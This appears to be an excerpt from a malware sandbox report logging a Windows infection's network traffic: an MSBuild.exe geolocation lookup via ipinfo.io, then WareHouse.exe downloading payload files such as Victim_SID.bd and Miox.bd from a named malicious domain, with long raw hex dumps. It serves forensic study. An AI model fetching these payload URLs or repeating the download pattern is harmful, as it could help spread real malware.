                            Data Ascii: LYrP$n_{wL~L2hHGTP)!Y{FL+/LlzuSLYL+K-ShxL~L0M*/`LLY6=N+KGIL+$Ll*|DSBLLY8myuMLYrL~mZsa%!LYL~h4V*LlL_sYQ&reL+Ur[]L~LGWtqELLYv$:Mcux
                            2024-07-27 09:37:15 UTC1369INData Raw: 72 77 65 50 24 1f 74 32 f9 cc a9 46 8d ed 74 73 36 d6 4c 59 0e 4c 7e 3e 21 c6 df 5e c8 28 e3 46 2c 4c 6c d4 4c ae 79 eb 1d 13 8c ff 7a 6d 5a 91 4c 59 ed 4c 2b 44 1a 48 2f 9d bf 2c 92 26 7a 4c 7e e6 4c ea 1f eb 1d 22 1f 3a 0b cd ad 62 4c ae d9 4c 59 41 c9 8a 0c 1e fb aa 51 a4 4b 4c 2b 26 4c 6c ad 0b d8 36 4d 58 90 72 77 41 4c ea af 4c 59 04 6f d9 ab fa 79 3c 62 a7 4f 4c 59 71 4c 7e 0b 6d 5a ba d5 d0 49 e9 7c c2 4c 6c 4d 4c ae a4 eb 1d dc 7b eb 1e 76 e3 08 4c 59 40 4c 2b 89 7e 9c c4 b8 bb 1d a9 5c a7 4c 7e bf 4c ea 44 ee b9 d9 3d 0a 41 1a 48 36 62 a7 f5 6e 38 78 eb 78 62 cf 28 ec ee b9 16 4c 2b 7d 4c 6c 53 59 8a 7d 5e c8 4e b7 30 18 4c ea 02 4c 59 fa 38 6d 30 5f bf b5 14 c1 29 c4 c2 a8 4c 7e b4 4c ea 92 d1 65 4f d1 a6 9c 2b 6b 36 6b a8 b9 2f 7a 45 9e ef 99
                            Data Ascii: rweP$t2Fts6LYL~>!^(F,LlLyzmZLYL+DH/,&zL~L":bLLYAQKL+&Ll6MXrwALLYoy<bOLYqL~mZI|LlML{vLY@L+~\L~LD=AH6bn8xxb(L+}LlSY}^N0LLY8m0_)L~LeO+k6k/zE
                            2024-07-27 09:37:15 UTC1369INData Raw: ea 4b eb 1d d0 eb 7e 01 31 77 fa 66 a2 3f 4c 59 53 cf bc 77 c4 50 46 5b bc ef 4c 2b b2 4c 6c 79 0b d8 c8 f5 b2 26 22 a7 e5 4c ea 7b 4c 59 54 38 6d 17 71 37 5b 50 84 db 4c 59 07 4c 7e bb 5a 4e 3e f5 b2 f9 ac 58 25 4c 6c d9 4c ae 70 eb 1d af 4c 7e 43 4c ea ac 4c 59 5a 63 85 cd dd 3c 26 9d bf 2e bc 29 73 4c 7e eb 4c ea 16 eb 1d 21 26 31 43 8e ef a4 a5 60 52 ce da 71 66 23 4e e5 b0 8e 49 ad 42 4c 2b 2b 4c 6c d3 4c ae 65 84 82 c2 3b a8 bc 4c ea a6 4c 59 8d 38 6d 8c 31 77 02 a5 60 a9 10 e6 b6 74 f0 6e a1 06 0d 1f 89 04 1f 3a 32 c2 17 44 4c ae ee 4c 59 b6 c9 8a a5 c4 50 0d d1 65 bd 4c 2b 20 4c 6c d1 62 a7 2b c4 c2 1d 19 d8 93 4b df 26 d6 d3 e1 4c 2b 98 4c 6c 92 7c 1e 68 fd 68 c2 9b 5a e3 76 e3 74 fd 68 1c 9a 0d 1d c2 17 96 b3 b6 64 cc d8 1d 3d 4e 11 4c ea fd 4c
                            Data Ascii: K~1wf?LYSwPF[L+Lly&"L{LYT8mq7[PLYL~ZN>X%LlLpL~CLLYZc<&.)sL~L!&1C`Rqf#NIBL++LlLe;LLY8m1w`tn:2DLLYPeL+ Llb+K&L+Ll|hhZvthd=NLL
                            2024-07-27 09:37:15 UTC1369INData Raw: 51 74 a2 4c d6 41 3f 4c ae 60 4c 59 1c c9 8a c2 4b df f9 8c 98 32 4c 2b c9 4c 6c c3 7c 1e 72 10 e6 d0 19 d8 4a aa bc a8 52 a7 4a 4c 2b 27 4c 6c 1a ce 2c 9d f5 b2 49 fa 6b 40 4c ea ae 4c 59 a1 38 6d 50 42 97 19 b7 b3 4e 4c 59 70 4c 7e 8e 7b ae 7b 54 50 89 29 fd 4c 66 e3 82 80 54 c9 c4 c2 5e b8 2a 23 4b df 4c 89 2c 41 4c 2b 28 4c 6c 22 7c 1e 88 fd 68 b2 9b 5a 43 76 e3 94 fd 68 ef 9a 0d ee c2 17 1a bc 9e 84 cc d8 ee 3d 4e e2 4c ea 5d 4c 59 83 29 fd 6d 9c 7d 2b 27 e3 ed 4c 59 01 4c 7e 6d 7b ae 28 25 62 25 41 b4 fa 31 77 ee 4c ae 33 4c 59 91 f6 72 38 50 24 ac cb 6e e4 9a 0d a9 bd 5f 20 9d bf 2e 7b 0e 55 4c 7e cd 4c ea 10 eb 1d 7f 68 bf 67 9c 7d 14 32 77 e7 4c 59 fd 4c 7e 67 7b ae ee 5e c8 15 2c 9a 0d 4c 6c e5 4c ae 58 eb 1d a2 4d 7f fe 99 8f a0 4c 59 cc 4c 2b
                            Data Ascii: QtLA?L`LYK2L+Ll|rJRJL+'Ll,Ik@LLY8mPBNLYpL~{{TP)LfT^*#KL,AL+(Ll"|hZCvh=NL]LY)m}+'LYL~m{(%b%A1wL3LYr8P$n_ .{UL~Lhg}2wLYL~g{^,LlLXMLYL+


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.94970834.117.59.814437732C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            TimestampBytes transferredDirectionData
                            2024-07-27 09:37:16 UTC63OUTGET /json HTTP/1.1
                            Host: ipinfo.io
                            Connection: Keep-Alive
                            2024-07-27 09:37:17 UTC345INHTTP/1.1 200 OK
                            access-control-allow-origin: *
                            Content-Length: 319
                            content-type: application/json; charset=utf-8
                            date: Sat, 27 Jul 2024 09:37:17 GMT
                            x-content-type-options: nosniff
                            via: 1.1 google
                            strict-transport-security: max-age=2592000; includeSubDomains
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2024-07-27 09:37:17 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                            Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.949710104.21.65.794438060C:\Users\user\AppData\Roaming\WareHouse.exe
                            TimestampBytes transferredDirectionData
                            2024-07-27 09:37:19 UTC136OUTGET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:19 UTC677INHTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:19 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 47616
                            Connection: close
                            etag: "ba00-66a2ddbd-31025;;;"
                            last-modified: Thu, 25 Jul 2024 23:20:29 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2F0JilD9ueh7OBgiEH6vbKuueED8tp8vnBKIGnAKZ2qwEdKuD8rNvCmZfnB9zw7W%2BRoKkTUkbSaUPvE3qhja82HuDiBsFngjRWlejuc0PXIftBlfi8EOPonGtD0Jb3goyzCrf2d6RGykUQLr"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba6702b6cc411-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-27 09:37:19 UTC692INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                            Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                            2024-07-27 09:37:19 UTC1369INData Raw: 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 8a 4c ae 69 b1 55 7e 4c 7e d2 4c ea 39 e8 1f 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 61 0e 3e 39 4c ea 23 4c 59 ae bf 8a 8a b2 b4 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 45 4d 2a 2d 4c 6c d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac 4c 7e 40 4c
                            Data Ascii: ~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+LlLiU~L~L97L+LlfLLYa>9L#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYEM*-LlL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL6LYL~@L
                            2024-07-27 09:37:19 UTC1369INData Raw: 5b c4 c2 3f 4c 2b e0 4c 6c 29 0b d8 54 68 dc 35 e0 66 24 1e fb 37 47 41 63 4c 2b 1a 4c 6c 35 e9 2a 14 c4 c2 59 57 42 71 26 72 38 10 e6 10 91 e5 a7 9c 7d b9 7c 1e 67 4c 59 7d 4c 7e 17 5a 4e 50 c4 c2 40 1a cd 5f 9c 7d e9 c6 12 df 4c 59 23 4c 7e bf 5a 4e f8 c4 c2 d0 d7 c1 41 dd 3c 70 a2 67 11 5e c8 9b 4c 7e 47 4c ea 68 ee b9 5e 63 85 c5 51 84 12 9d bf ec 49 ad 77 4c 7e ef 4c ea 02 49 ad 3d 9a 0d 71 fb 78 53 66 a2 ce c4 c2 6c 6e 1e fc a1 06 6e bc 29 67 3d 0a 53 e3 24 c6 9d bf d2 07 01 90 4c 7e 48 4c ea 56 49 ad 83 65 72 a8 31 77 3c 4c ae 62 4c 59 1e c9 8a 61 ba 2c 41 10 e6 49 d7 c1 5a 9c 7d d8 d3 06 da 4c 59 06 4c 7e ba 5a 4e dd c4 c2 d9 5d 79 12 2b 6b c6 b0 b4 59 42 35 7e df ae 8b f5 20 30 a7 e0 e5 4c 2b 9c 4c 6c 96 7c 1e a7 10 e6 21 df ae 3f 09 9c e1 9e 49
                            Data Ascii: [?L+Ll)Th5f$7GAcL+Ll5*YWBq&r8}|gLY}L~ZNP@_}LY#L~ZNA<pg^L~GLh^cQIwL~LI=qxSflnn)g=S$L~HLVIer1w<LbLYa,AIZ}LYL~ZN]y+kYB5~ 0L+Ll|!?I
                            2024-07-27 09:37:19 UTC1369INData Raw: 6f d9 a7 42 97 c8 92 47 88 4c 59 97 4c 7e eb 5a 4e d0 eb 1d d5 b7 22 b5 4c 6c 4f e9 2a 61 a9 5c 7f 4c 7e d3 4c ea 52 c4 c2 b7 8e e8 f1 b2 b4 67 4c ae b5 92 26 20 4c 7e 38 4c ea 22 4c 59 72 e4 f1 13 4c 6c df 4c ae 0d 10 e6 98 4c 7e 50 6b 7e e5 74 32 70 bd 88 81 67 e2 a4 59 8a 07 74 32 6b 87 d1 57 a0 07 13 99 3e cd 6b bd 84 0e 2c 5c 59 8a af 74 32 fb 78 e9 ff a0 07 43 74 32 87 cc a9 78 5a 08 96 0e ec a9 3a 4d e9 50 84 b4 04 d1 1e 11 e7 a0 85 52 62 5f bf ea 1b c8 23 0c 19 1d c9 8a ef 76 e3 79 4c 59 b7 1a cd 7d 0a 59 62 4c ae d9 4c 59 05 4c 7e 23 a6 f0 86 8c 98 7b 6f d9 26 4c 6c e3 b7 b3 37 4c 59 ad 4c 7e 41 4c ea 43 47 41 e7 4c 2b 9e 4c 6c 0b a5 60 4f 4c 59 c5 9b 5a f5 26 72 1a 74 32 6d ac 58 d2 5d bc a6 a4 61 f7 3a 4d 17 e0 66 6c 47 90 41 f3 14 50 df f9 d0
                            Data Ascii: oBGLYL~ZN"LlO*a\L~LRgL& L~8L"LYrLlLL~Pk~t2pgYt2kW>k,\Yt2xCt2xZ:MPRb_#vyLY}YbLLYL~#{o&Ll7LYL~ALCGAL+Ll`OLYZ&rt2mX]a:MflGAP
                            2024-07-27 09:37:19 UTC1369INData Raw: 6c 58 dc fc 66 4c 59 7c 4c 7e 5e a1 06 7e 4c 59 83 9a 0d 88 4b 18 c4 7c 1e 15 30 95 f1 9e ef ee ca 1e 21 4c 59 4d 4c 2b 94 a9 a8 b2 20 e4 14 da 7c d9 0d 3c 46 4c ea 99 4c 59 23 6f d9 4c 1a 48 9a 73 36 c9 ee b9 0d 41 96 79 eb fc 75 4c 59 94 47 d2 df b0 b6 6a 4c ae d5 4c 59 a9 2a ba 37 da cc f9 db 7d 6b a3 07 5e 2c 0c 85 dc fc 8e fd 68 d9 30 36 98 1e fb df 91 25 ef 4c 2b b2 4c 6c 49 e9 2a f8 84 82 67 63 e4 e5 4c ea 7b 4c 59 54 38 6d bf c8 d9 44 48 9b db 4c 59 07 4c 7e 20 a6 f0 85 8c 98 78 6f d9 25 4c 6c e0 b7 b3 34 4c 59 af 4c 7e 43 4c ea 40 47 41 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 c7 9b 5a f7 26 72 19 74 32 2e ec 1b d1 5d bc a5 a4 61 f4 3a 4d 14 e0 66 6e 47 90 02 b1 55 52 df f9 d2 67 e2 86 fb fb ce 78 0d e4 0e 3e 68 6b 7e be 47 41 87 85 52 b3 29 68 a8 5c
                            Data Ascii: lXfLY|L~^~LYK|0!LYML+ |<FLLY#oLHs6AyuLYGjLLY*7}k^,h06%L+LlI*gcL{LYT8mDHLYL~ xo%Ll4LYL~CL@GAL+Ll`LLYZ&rt2.]a:MfnGURgx>hk~GAR)h\
                            2024-07-27 09:37:19 UTC1369INData Raw: 0f 9e 49 ec 75 f1 57 47 90 e3 ce da 18 6b bd 52 0e 2c 09 59 8a 9b 47 41 e7 50 84 6f 97 c0 4b 9e 49 5d 62 84 d5 c2 17 93 5e 3c 1c 78 0d 37 0e 3e ab 7b ae 7e 54 50 38 4c 2b 21 a9 a8 4c 48 9b d7 4c 59 0f 4c 7e 33 4c ea f0 c4 c2 c5 8e e8 99 a9 a8 d5 4c ae 15 00 74 93 4c 7e 4b 4c ea 90 4c 59 26 91 e5 b1 4c 6c 3f 4c ae ae 10 e6 7b 4c 7e d0 da cc 1e eb 1d 27 0a 1e 88 0d 2f 63 4c ae d8 4c 59 34 3d 4e 88 6b 7e 1e 47 41 dd 4b 5e 37 5d bc ca 9d bf 15 2f 7a ac 4c 7e 40 4c ea ea eb 1d 05 6f d9 8e 9c 7d be e0 24 4e 4c 59 70 4c 7e 8e 7b ae 63 5e c8 bf fe ca c3 4c 6c 4c 4c ae a5 eb 1d 3d 4a 48 01 eb fc 09 4c 59 7b 47 d2 37 b0 b6 d0 4c ae 39 4c 59 52 2a ba 01 36 a2 ac 54 50 e9 4c 2b 7c 51 84 1f 48 9b 91 bb cd 5e 4c 7e d6 6b 7e 49 bb cd 17 4c 2b e8 1a 48 fd 02 d7 dc fd 68
                            Data Ascii: IuWGkR,YGAPoKI]b^<x7>{~TP8L+!LHLYL~3LLtL~KLLY&Ll?L{L~'/cLLY4=Nk~GAK^7]/zL~@Lo}$NLYpL~{c^LlLL=JHLY{G7L9LYR*6TPL+|QH^L~k~IL+Hh
                            2024-07-27 09:37:19 UTC1369INData Raw: 4c 7e 77 6d 5a 89 5e c8 26 ba ed b9 4c 6c 83 4c ae ec 49 ad 76 4d 7f b4 80 36 74 4c 59 3a 4c 2b f5 7e 9c be b8 bb 4a e1 05 0c 4c 7e 30 4c ea 3e ee b9 97 1f 3a b4 16 83 d7 4c ae 3e 4c 59 54 2a ba 49 4d eb 05 1a fe ee 4c 2b b3 4c 6c 9c 7c 1e b3 5e c8 f4 f2 b6 e4 4c ea 7a 4c 59 b5 1a cd ca 4d 6d 8a 80 54 da 4c 59 06 4c 7e ae 6d 5a f3 da 7c 37 05 91 24 4c 6c d8 4c ae 95 ee b9 3f 9e ef ed 40 b4 ad 4c 59 e5 4c 2b 78 a9 a8 37 4d af 8f ce da 72 4c 7e ea 4c ea d1 ee b9 0e 1f 3a 22 ef 8c 4e 4c ae d1 4c 59 8d 2a ba 14 4d eb e3 10 e6 43 4c 2b 2a 4c 6c 21 7c 1e 2e da 7c 1b 74 f0 bd 4c ea a7 4c 59 08 6f d9 87 9c 7d 63 d5 00 47 4c 59 5d 4c 7e 27 5a 4e 5e 4d 58 02 a9 3d 7e 4c 6c 45 4c ae 0c ee b9 d0 9e ef 43 42 b6 00 4c 59 bc 4c 2b a5 a9 a8 ec 4d af 2a c4 c2 ab 4c 7e b7
                            Data Ascii: L~wmZ^&LlLIvM6tLY:L+~JL~0L>:L>LYT*IML+Ll|^LzLYMmTLYL~mZ|7$LlL?@LYL+x7MrL~L:"NLLY*MCL+*Ll!|.|tLLYo}cGLY]L~'ZN^MX=~LlELCBLYL+M*L~
                            2024-07-27 09:37:19 UTC1369INData Raw: a2 c1 cb 6e c9 7e 49 e0 2b 6b 32 15 c0 f1 cb 6e f2 63 e4 92 6d 5a 20 54 50 76 6c db 2c 4c 6c 86 dc fc a3 25 62 42 5e 6e 0b 0e a8 a9 35 71 ed 4c 2b b0 4c 6c 3e 4c ae 0b 76 31 89 6e 1e 89 31 96 fd 49 ad 63 5d 79 63 67 e2 72 5c 3e 98 0f 1a fe 13 c6 1d 4c ea 07 4c 59 4b 4c 2b 4e c0 14 41 15 c0 43 49 ad 7d df ae dd 31 96 3e 5e c8 a6 0e 6a 9e 4c 6c 35 4c ae eb 49 ad 71 4c 7e 2f 5a 4e f7 49 ad 4c 5d 79 4c 67 e2 e9 e9 2a 8c 42 35 e2 75 f1 87 de 7a 4a 0f 1a b8 c6 13 29 4c 6c d1 4c ae 38 4c 59 cf 53 86 85 a0 07 3e c4 c2 22 91 e5 7d 51 84 00 a5 60 74 ee b9 e3 e0 66 6c a1 06 ec ee b9 fb 62 84 47 66 e3 cb c6 12 96 91 25 e6 1b db bb fc 49 02 4c 59 85 63 85 83 7e 9c f0 50 84 a2 9e 49 36 63 e4 54 6d 5a 11 10 e6 01 6f d9 47 b2 b4 e5 3a 79 b1 02 76 60 7a ea fc 6d 5a 4d c4
                            Data Ascii: n~I+k2ncmZ TPvl,Ll%bB^n5qL+Ll>Lv1n1Ic]ycgr\>LLYKL+NACI}1>^jLl5LIqL~/ZNIL]yLg*B5uzJ)LlL8LYS>"}Q`tflbGf%ILYc~PI6cTmZoG:yv`zmZM
                            2024-07-27 09:37:19 UTC1369INData Raw: 47 4c 2b 6a 4b 18 cd b0 b4 9f ee b9 cd a6 a2 f7 47 90 9d d3 67 04 71 d5 87 d9 c9 13 b0 b4 cf 30 95 43 74 f0 07 6d 5a 16 74 32 3f a0 04 f2 f5 b0 94 98 4b c4 c4 c2 a3 2a ba 43 17 42 94 1f 89 a2 63 85 a9 05 90 2c cb 18 e0 78 0d 14 74 f0 c7 5a 4e ec 0c 19 71 aa 3e 7e ed 8e 37 4c ae dc 1f 89 c8 82 54 fb de 7a 82 bc 29 4e 5d 79 07 a9 a8 bb b9 ba 22 ee b9 d4 63 e4 bc 17 42 e2 10 e6 ea d7 c1 32 d6 41 e8 40 94 46 e4 a1 3e 63 e4 ec 5c ba af 54 50 ea 4c 2b 38 66 e3 68 dc fc 43 a9 5c 89 d8 18 d4 6b 7e 8b 7b 0e 81 29 fd 6e 9c 7d b9 b7 b3 ee 4c 59 02 4c 7e 6e 7b ae 01 4c 59 b8 78 2e b4 b8 38 ec 4c ae 31 4c 59 7e 39 aa d1 09 9c f0 e0 04 a0 0e 6a 98 4c 6c 32 4c ae 61 d1 65 9b 16 00 4f cf 28 8c 05 02 1b 4c 2b 74 4c 6c 7a 7c 1e 74 5e c8 fb 88 cb 11 4c ea fd 4c 59 f3 38 6d
                            Data Ascii: GL+jKGgq0CtmZt2?K*CBc,xtZNq>~7LTz)N]y"cB2A@F>c\TPL+8fhC\k~{)n}LYL~n{LYx.8L1LY~9jLl2LaeO(L+tLlz|t^LLY8m
                            2024-07-27 09:37:19 UTC1369INData Raw: 8c ec b0 c0 14 51 fd 68 7b 4c 7e e7 4c ea 1e eb 1d 17 78 2e 1f b8 38 b6 b8 bb db 4e 5b 04 4c 7e 1c 4c ea 36 ee b9 9f 0a 1e 0d 83 56 db 4c ae 36 4c 59 4c 3d 4e 01 0e a8 18 08 ef fe e4 f1 9f 4c 6c 34 4c ae 03 74 32 d3 3e 4d 05 c4 50 c3 fd 68 1d 4c 2b c3 4c 6c 0a 0b d8 e7 a9 5c 9e 39 aa 23 4b df 0a 4e 5b 41 4c 2b 28 4c 6c 22 7c 1e 2c da 7c 8c 11 c5 be 4c ea a5 4c 59 0b 6f d9 d6 0d 2f ea 1e 7c 5d 47 41 5e 4c 7e e2 4c ea 10 74 32 a2 cb dc f2 42 97 67 6d 8f ed 4c 59 01 4c 7e 6d 7b ae f4 a9 5c db 48 5d f5 fa 79 ec 4f ad 33 4c 59 a9 4c 7e 55 6d 5a 3e da 7c c9 c5 10 9a 4c 6c 31 4c ae 7b ee b9 14 0d 3c 98 28 3c f3 49 ad 18 4c 2b 76 4c 6c f7 02 d7 01 5b bc 30 91 44 32 3f cb ff 4c 59 b4 4c 2b 49 4b 18 e0 48 9b 08 bb cd 36 7b eb b9 4e e9 a0 4c 59 cc 4c 2b 61 7e 9c 2a
                            Data Ascii: Qh{L~Lx.8N[L~L6VL6LYL=NLl4Lt2>MPhL+Ll\9#KN[AL+(Ll"|,|LLYo/|]GA^L~Lt2BgmLYL~m{\H]yO3LYL~UmZ>|Ll1L{<(<IL+vLl[0D2?LYL+IKH6{NLYL+a~*


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.949711104.21.65.794438060C:\Users\user\AppData\Roaming\WareHouse.exe
                            TimestampBytes transferredDirectionData
                            2024-07-27 09:37:20 UTC130OUTGET /assuence/litesolidCha/Miox.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:20 UTC677INHTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:20 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 549888
                            Connection: close
                            etag: "86400-66a37fb9-2699a;;;"
                            last-modified: Fri, 26 Jul 2024 10:51:37 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4GbqXBhQ2tCBNPiJpzk6ony8XJlrQFr99kXDtsLbggEiev5RNEhvSULnic0XHUGtipIKSnFAdri73kRmv1XWxlJCRdWECBwIL63fgz%2B5IUxk2HV6kyQuPB0LNBdl24Ns8kBE7jRaEUfF1FaA"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba6776db8437a-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-27 09:37:20 UTC692INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                            Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                            2024-07-27 09:37:20 UTC1369INData Raw: 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 79 fe df 1a 90 24 ea 9b 5a d2 4c ea e1 27 61 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 21 4c 7e a5 26 72 23 4c 59 ac bc 89 ae 05 90 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 05 0e 6a 81 b2 b4 d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 fc df f9 fc a7 21 ab 59 8a 60 4c 59 0a ac 9c e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac 4c 7e 40 4c
                            Data Ascii: ~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+Lly$ZL'a7L+LlfLLY!L~&r#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYjL)L~KLLY!Y`LYLxLY2L+LlcLLYL~LLYJL+'LlL6LYL~@L
